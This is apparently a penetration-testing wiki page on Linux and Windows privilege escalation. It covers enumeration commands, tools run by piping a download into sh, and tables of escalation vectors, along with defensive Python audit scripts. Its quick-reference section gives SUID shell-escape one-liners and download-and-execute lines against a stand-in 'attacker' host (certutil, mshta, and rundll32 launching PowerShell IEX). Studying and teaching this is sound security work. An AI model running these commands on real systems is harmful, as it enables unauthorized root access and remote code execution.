# Privilege Escalation

This page provides an overview of privilege escalation techniques. For detailed platform-specific guides, see:

* [Linux Privilege Escalation](/post-exploitation/linux.md)
* [Windows Privilege Escalation](/post-exploitation/windows.md)

## General Methodology

### 1. Situational Awareness

```bash
# Who am I?
whoami
id
hostname

# What system is this?
uname -a                    # Linux
systeminfo                  # Windows
cat /etc/*release           # Linux distro

# Network information
ip a                        # Linux (iproute2)
ifconfig                    # Linux (net-tools)
ipconfig /all               # Windows
netstat -antup              # Linux
netstat -ano                # Windows
```

### 2. Users & Groups

```bash
# Linux
cat /etc/passwd
cat /etc/group
cat /etc/shadow             # If readable
who
w
last

# Windows
net user
net localgroup
net localgroup Administrators
whoami /priv
whoami /groups
```

### 3. Running Processes & Services

```bash
# Linux
ps aux
ps -ef
top
cat /etc/services

# Windows
tasklist /v
wmic process list full
sc query
net start
```

### 4. Installed Software

```bash
# Linux
dpkg -l                     # Debian
rpm -qa                     # RHEL
pip list
which python perl ruby gcc nc wget curl

# Windows
wmic product get name,version
reg query HKLM\SOFTWARE
dir "C:\Program Files"
dir "C:\Program Files (x86)"
```

### 5. Scheduled Tasks

```bash
# Linux
crontab -l
ls -la /etc/cron*
cat /etc/crontab
systemctl list-timers

# Windows
schtasks /query /fo LIST /v
dir C:\Windows\Tasks
```
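The five steps above only collect raw output. As an added example (not part of the original page) of turning step 5 into an actual check, the script below parses `/etc/crontab`-style text and flags root jobs whose command a lower-privileged user could influence: a target script that is group/world-writable, or an unqualified command name that is resolved through the crontab `PATH`. The crontab content and the temporary script are constructed for the demonstration, and `SHELL_BUILTINS` is an assumed short list of builtins that never resolve through `PATH`.

```python
import os
import re
import stat
import tempfile

# Shell builtins that never resolve through PATH (assumption: deliberately short list).
SHELL_BUILTINS = {"cd", "test", "[", "export", "true", "false"}

# Constructed /etc/crontab-style content; {script} is filled in by build_sample().
SAMPLE_CRONTAB_TEMPLATE = """\
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user command
*/5 *   * * *   root    {script}
0 3     * * *   backup  /home/backup/rotate.sh
*/1 *   * * *   root    cleanup.sh
0 4     * * *   root    /usr/sbin/logrotate /etc/logrotate.conf
"""


def parse_system_crontab(text):
    """Parse /etc/crontab text: VAR=value lines, then five time fields, a user and a command."""
    env, jobs = {}, []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        m = re.match(r"^([A-Za-z_][A-Za-z0-9_]*)=(.*)$", line)
        if m:
            env[m.group(1)] = m.group(2).strip().strip('"')
            continue
        parts = line.split(None, 6)
        if len(parts) == 7:
            jobs.append({"schedule": " ".join(parts[:5]), "user": parts[5], "command": parts[6]})
    return env, jobs


def others_can_write(path):
    """True if group/others may modify path. Sticky world-writable dirs such as /tmp are
    excluded: others can create files there but cannot replace files they do not own."""
    try:
        st = os.lstat(path)
    except OSError:
        return False  # missing or unreadable: nothing to flag here
    if stat.S_ISDIR(st.st_mode) and st.st_mode & stat.S_ISVTX:
        return False
    return bool(st.st_mode & (stat.S_IWGRP | stat.S_IWOTH))


def audit_root_cron_jobs(text):
    """Return findings for root jobs whose command could be influenced by a non-root user."""
    env, jobs = parse_system_crontab(text)
    path_dirs = [d for d in env.get("PATH", "").split(":") if d]
    findings = []
    for job in jobs:
        if job["user"] != "root":
            continue
        tokens = job["command"].split()
        first = tokens[0]
        # A bare command name is looked up in the crontab PATH, so every PATH dir matters.
        if not first.startswith("/") and first not in SHELL_BUILTINS:
            findings.append({"command": job["command"],
                             "reason": "unqualified command resolved via PATH",
                             "writable_path_dirs": [d for d in path_dirs if others_can_write(d)]})
        # Any absolute path in the command line that others can modify is a finding.
        for tok in tokens:
            if tok.startswith("/") and others_can_write(tok):
                findings.append({"command": job["command"],
                                 "reason": "group/world-writable target", "path": tok})
    return findings


def build_sample():
    """Create a constructed temp dir holding one root cron script that others can write."""
    root = tempfile.mkdtemp(prefix="cron-audit-")
    script = os.path.join(root, "backup.sh")
    with open(script, "w") as f:
        f.write("#!/bin/sh\necho backup\n")
    os.chmod(script, 0o777)  # deliberately misconfigured for the demonstration
    return script, SAMPLE_CRONTAB_TEMPLATE.format(script=script)


if __name__ == "__main__":
    script, text = build_sample()
    for finding in audit_root_cron_jobs(text):
        print(finding)
    # On a real host: audit_root_cron_jobs(open("/etc/crontab").read())
```

On the constructed input the audit reports two findings: the world-writable `backup.sh` and the bare `cleanup.sh` that depends on `PATH`; the non-root `backup` job and the fully qualified `logrotate` job are not reported. Jobs in `/etc/cron.d/*` use the same format and can be fed through the same function.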

## Automated Enumeration Tools

### Linux

```bash
# LinPEAS - Most comprehensive
curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh

# LinEnum
wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh
chmod +x LinEnum.sh && ./LinEnum.sh -t

# Linux Exploit Suggester
wget https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh
chmod +x linux-exploit-suggester.sh && ./linux-exploit-suggester.sh

# pspy - Monitor processes
wget https://github.com/DominicBreuker/pspy/releases/download/v1.2.0/pspy64
chmod +x pspy64 && ./pspy64
```

### Windows

```powershell
# WinPEAS
# https://github.com/carlospolop/PEASS-ng/releases
.\winPEASany.exe

# PowerUp
# https://github.com/PowerShellMafia/PowerSploit/blob/master/Privesc/PowerUp.ps1
Import-Module .\PowerUp.ps1
Invoke-AllChecks

# Seatbelt
# https://github.com/GhostPack/Seatbelt
.\Seatbelt.exe -group=all

# SharpUp
# https://github.com/GhostPack/SharpUp
.\SharpUp.exe
```

## Common Privilege Escalation Vectors

### Linux

| Vector               | Description                               | Detection                        |
| -------------------- | ----------------------------------------- | -------------------------------- |
| SUID/SGID            | Binaries running with elevated privileges | `find / -perm -4000 2>/dev/null` |
| Sudo misconfig       | Commands allowed without password         | `sudo -l`                        |
| Capabilities         | Special kernel privileges                 | `getcap -r / 2>/dev/null`        |
| Writable files       | Config files, scripts                     | `find / -writable 2>/dev/null`   |
| Cron jobs            | Root jobs running writable scripts        | `cat /etc/crontab`               |
| Kernel exploits      | Unpatched kernel                          | `uname -a`                       |
| NFS no\_root\_squash | Mountable shares                          | `cat /etc/exports`               |
| Docker group         | Container escape                          | `id \| grep docker`              |
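The `find / -perm -4000` check in the table prints every setuid binary, but on a real host most of them are legitimate. What a defender actually wants is the difference from a known-good list. The following added example (not from the original page) walks a tree, collects setuid/setgid regular files without following symlinks, and diffs them against a baseline file taken from a golden image; the sample tree, file names and baseline are constructed for the demonstration.

```python
import os
import stat
import tempfile

SETID_BITS = stat.S_ISUID | stat.S_ISGID


def find_setid_files(root):
    """Relative paths of regular files under root with the setuid or setgid bit set.
    Symlinks are not followed and unreadable directories are skipped (the 2>/dev/null of
    the find command in the table)."""
    found = set()
    for dirpath, _dirnames, filenames in os.walk(root, onerror=lambda e: None):
        for name in filenames:
            full = os.path.join(dirpath, name)
            try:
                st = os.lstat(full)
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & SETID_BITS:
                found.add(os.path.relpath(full, root))
    return found


def load_baseline(path):
    """Read one relative path per line; blank lines and '#' comments are ignored."""
    with open(path) as f:
        return {ln.strip() for ln in f if ln.strip() and not ln.startswith("#")}


def diff_against_baseline(current, baseline):
    """Return (unexpected, missing): setid files absent from the baseline, and baseline
    entries that are no longer setid (which may indicate a replaced or removed binary)."""
    return sorted(current - baseline), sorted(baseline - current)


def audit(root, baseline_file):
    return diff_against_baseline(find_setid_files(root), load_baseline(baseline_file))


def build_sample():
    """Constructed tree: one expected setuid binary, one unexpected one, one plain file."""
    root = tempfile.mkdtemp(prefix="setid-audit-")
    os.mkdir(os.path.join(root, "bin"))
    for name, mode in (("ping", 0o4755), ("helper", 0o4755), ("readme", 0o644)):
        p = os.path.join(root, "bin", name)
        with open(p, "w") as f:
            f.write("placeholder\n")
        os.chmod(p, mode)  # setuid on our own file needs no root
    baseline_file = os.path.join(root, "baseline.txt")
    with open(baseline_file, "w") as f:
        f.write("# setuid list captured from the golden image (constructed)\nbin/ping\n")
    return root, baseline_file


if __name__ == "__main__":
    root, baseline = build_sample()
    unexpected, missing = audit(root, baseline)
    print("unexpected setuid/setgid:", unexpected)
    print("missing from baseline:", missing)
    # On a real host: audit("/", "/var/lib/setid-baseline.txt") with a baseline you generated
    # from a clean build, then alert on any non-empty "unexpected" list.
```

Run against the constructed tree, `bin/helper` is reported as unexpected and nothing is missing. The same baseline-diff approach applies to the `getcap -r /` and `find / -writable` checks in the table: record the clean state once, then alert on drift.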

### Windows

| Vector                    | Description                             | Detection                            |
| ------------------------- | --------------------------------------- | ------------------------------------ |
| Unquoted service paths    | Service path without quotes             | `wmic service get name,pathname`     |
| Weak service permissions  | Modifiable service binaries             | `accesschk.exe /accepteula -uwcqv *` |
| AlwaysInstallElevated     | MSI packages install as SYSTEM          | `reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated` (and the same key under HKCU) |
| Stored credentials        | Cached passwords                        | `cmdkey /list`                       |
| DLL hijacking             | Missing DLLs in PATH                    | Process Monitor                      |
| Token impersonation       | SeImpersonatePrivilege (Potato attacks) | `whoami /priv`                       |
| Unpatched vulnerabilities | Missing KB hotfixes                     | `systeminfo`                         |
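`wmic service get name,pathname` lists every service, so the unquoted-path check still has to be applied by eye. As an added example (not from the original page), the parser below reads that fixed-width output, skips quoted paths, isolates the executable portion of each unquoted path, flags those containing spaces, and lists the intermediate file names Windows would try first; those are the locations whose parent directories an administrator must confirm are not writable by standard users. The wmic output and service names are constructed.

```python
import re

# Constructed sample of `wmic service get name,pathname` output (fixed-width columns).
SAMPLE_WMIC_OUTPUT = r"""
Name       PathName
Spooler    C:\Windows\System32\spoolsv.exe
VendorSvc  C:\Program Files\Vendor App\bin\service.exe -config default
GoodSvc    "C:\Program Files\Good Vendor\svc.exe" -run
Svchost    C:\Windows\system32\svchost.exe -k netsvcs
"""

EXE_RE = re.compile(r"^(.*?\.exe)", re.IGNORECASE)


def parse_wmic_services(text):
    """Split wmic's fixed-width output into (name, pathname) pairs using the header offset."""
    lines = [ln.rstrip() for ln in text.splitlines() if ln.strip()]
    col = lines[0].index("PathName")
    return [(line[:col].strip(), line[col:].strip()) for line in lines[1:]]


def executable_part(pathname):
    """Executable portion of an unquoted path: everything up to the first '.exe'."""
    m = EXE_RE.match(pathname)
    return m.group(1) if m else pathname.split(" ")[0]


def search_candidates(exe_path):
    """File names tried, in order, when a path with spaces is unquoted, e.g.
    C:\\Program Files\\Vendor App\\bin\\service.exe ->
    C:\\Program.exe, C:\\Program Files\\Vendor.exe, C:\\Program Files\\Vendor App\\bin\\service.exe"""
    parts = exe_path.split(" ")
    candidates = []
    for i in range(1, len(parts) + 1):
        prefix = " ".join(parts[:i])
        candidates.append(prefix if prefix.lower().endswith(".exe") else prefix + ".exe")
    return candidates


def find_unquoted_service_paths(text):
    """Return services whose unquoted executable path contains a space."""
    findings = []
    for name, pathname in parse_wmic_services(text):
        if pathname.startswith('"'):
            continue  # quoted: the executable boundary is explicit, nothing to check
        exe = executable_part(pathname)
        if " " in exe:
            findings.append({"service": name, "executable": exe,
                             "check_candidates": search_candidates(exe)})
    return findings


if __name__ == "__main__":
    for f in find_unquoted_service_paths(SAMPLE_WMIC_OUTPUT):
        print(f["service"], "->", f["executable"])
        for c in f["check_candidates"][:-1]:
            print("   verify parent dir of", c, "is not writable by standard users")
    # On a real host, pipe the actual `wmic service get name,pathname` output into the parser.
```

On the sample, only `VendorSvc` is flagged; `GoodSvc` is quoted and the two `C:\Windows` services have no space before `.exe`. The fix for a flagged service is to quote its `ImagePath` (via `sc config` or the vendor's installer), and the candidate list tells you which directories to audit meanwhile.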

## Quick Reference

### GTFOBins (Linux)

```bash
# https://gtfobins.github.io/
# SUID exploitation examples

# Python
python -c 'import os; os.execl("/bin/sh", "sh", "-p")'

# Find
find . -exec /bin/sh -p \; -quit

# Vim
vim -c ':py import os; os.execl("/bin/sh", "sh", "-p")'

# Bash
/bin/bash -p
```

### LOLBAS (Windows)

```powershell
# https://lolbas-project.github.io/
# Living Off The Land Binaries

# certutil - Download files
certutil -urlcache -f http://attacker/file.exe file.exe

# mshta - Execute HTA
mshta http://attacker/evil.hta

# rundll32 - Execute DLL
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication";document.write();h=new%20ActiveXObject("WScript.Shell").Run("powershell -ep bypass -c IEX(cmd)")
```

## Resources

* [HackTricks - Linux Privilege Escalation](https://book.hacktricks.xyz/linux-hardening/privilege-escalation)
* [HackTricks - Windows Privilege Escalation](https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation)
* [PayloadsAllTheThings - Linux Privesc](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Linux%20-%20Privilege%20Escalation.md)
* [PayloadsAllTheThings - Windows Privesc](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Privilege%20Escalation.md)
* [Absolomb's Security Blog - Windows Privilege Escalation Guide](https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/)

